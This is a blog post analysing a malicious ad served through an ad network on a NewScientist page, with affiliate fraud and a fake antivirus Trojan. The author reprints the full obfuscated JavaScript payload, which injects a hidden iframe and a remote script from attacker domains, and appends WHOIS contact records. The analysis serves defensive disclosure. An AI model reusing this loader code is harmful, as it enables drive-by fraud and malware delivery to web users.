Anatomy of a Fraud
Now that I have a blog, I can document some of the malware that I come across. The impetus behind this post is a retweeted link to a NewScientist story entitled "Genome firm shoots itself in the foot."
The problem starts with the fact that the NewScientist uses ADTECH to serve banner ads via some JavaScript magic. The way the JavaScript magic works is as follows:
- A NewScientist web page requests JavaScript from an ADTECH server.
- The ADTECH server responds with a JavaScript that contains a request for another JavaScript from a 3rd party server.
- Periodically, "farmingtoncp.com" is the 3rd party server from which the ultimate JavaScript is requested.
The problem with "farmingtoncp.com" is that it occasionally delivers the following JavaScript:
document.write(unescape("%3Ca href='http%3A%2F%2Fjetblue.com%2F%3F%3D3468' target='_blank'%3E%3Cimg src='http://farmingtoncp.com/bdb/Jetblue/728x90_upd.jpg' border='0' %3E%3C/a%3E")); statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60); var cd1 = "ine"; var cd2 = "rsard.co"; var cd3 = "m"; var cur_domain = cd1 + cd2 + cd3; var all_t = "-10,-9,-8,-7,-6,-5,-4,-3,-1,0,1"; var mtch = all_t.match(statictml); if ( mtch == null ) { document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=191959845&s=1&e=0' style='visibility:hidden;' width='0' height='0' %3E%3C/iframe%3E")); } else { var abc = "http://nokian-d"; var def = "iscounts.cn/go.php?i"; var klm = "d=2006-51&key=0522c7066&d=1"; var action_URL = abc + def + klm; eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%22%25%33%43%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%22%20%2B%20%63%75%72%5F%64%6F%6D%61%69%6E%20%2B%20%22%2F%69%6E%63%6C%75%64%65%73%30%32%2E%6A%73%27%20%74%79%70%65%3D%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%25%33%45%25%33%43%2F%73%63%72%69%70%74%25%33%45%22%29%29%3B')); } //!mtch This JavaScript may look complex, but it is really quite simple. Its mission is two-fold. First, it sets up a banner ad for JetBlue Airways. If one clicks on the ad, the fraudsters earn a commission via JetBlue's affiliate program run by Commission Junction. The offending JetBlue URL containing the affiliate code is as follows:
http://jetblue.com/?=3468 Secondly, the JavaScript contacts a server at "inersard.com" in order to trigger a redirect to an action_URL, which, in this case, points to a server at the "nokian-discounts.cn" domain name.
From a user's perspective, all of the above happens in an instant so that the page at the NewScientist is bypassed and, in its place, one gets a scary page that declares that "your PC needs to install antimalware software! Antivir can perform fast and free scan of your computer." Unfortunately, if one downloads this antimalware software, one gets a 184,320 byte .exe file (MD5: 800dae61b734f31c9dab82cbd4135594) from "n6-scanner.com" that is really a Trojan horse known as Trojan.Agent.180224.
As you can see, these kinds of scams involve several entities, including many legitimate businesses. Such complexity makes halting Internet-based fraud almost impossible. Still, I hope that this is the last time that I have to deal with malware being delivered over an ad network.
Addendum
The (presumably fake) WHOIS information for each of the sites listed above:
Kelly Lattimore dns@farmingtoncp.com 618-329-3335 fax: 618-329-3335 273 Eagle Street Oakdale IL 62268 us DNS: ns1.everydns.net ns2.everydns.net Created: 2009-12-02 Expires: 2010-12-02
Steve Garcia admin@inersard.com 218-597-0073 fax: 218-597-0073 1427 Terra Cotta St Strandquist MN 56758 us DNS: ns1.everydns.net ns2.everydns.net Created: 2009-12-21 Expires: 2010-12-21
Domain Name: nokian-discounts.cn ROID: 20091213s10001s02831682-cn Domain Status: clientTransferProhibited Administrative Email: jeya32jay@live.co.uk Name Server:ns1.everydns.net Name Server:ns2.everydns.net Name Server:ns3.everydns.net Name Server:ns4.everydns.net Registration Date: 2009-12-13 21:36 Expiration Date: 2010-12-13 21:36
Domain Name: n6-scanner.com Henry Nguyen Gong contact@privacy-protect.cn +33.0466583875 fax: +33.0466583875 Rue la produit 34 Nimes Languedoc-Roussillon 30189 fr DNS: ns1.everydns.net ns2.everydns.net ns3.everydns.net ns4.everydns.net Created: 2009-12-20 Expires: 2010-12-20
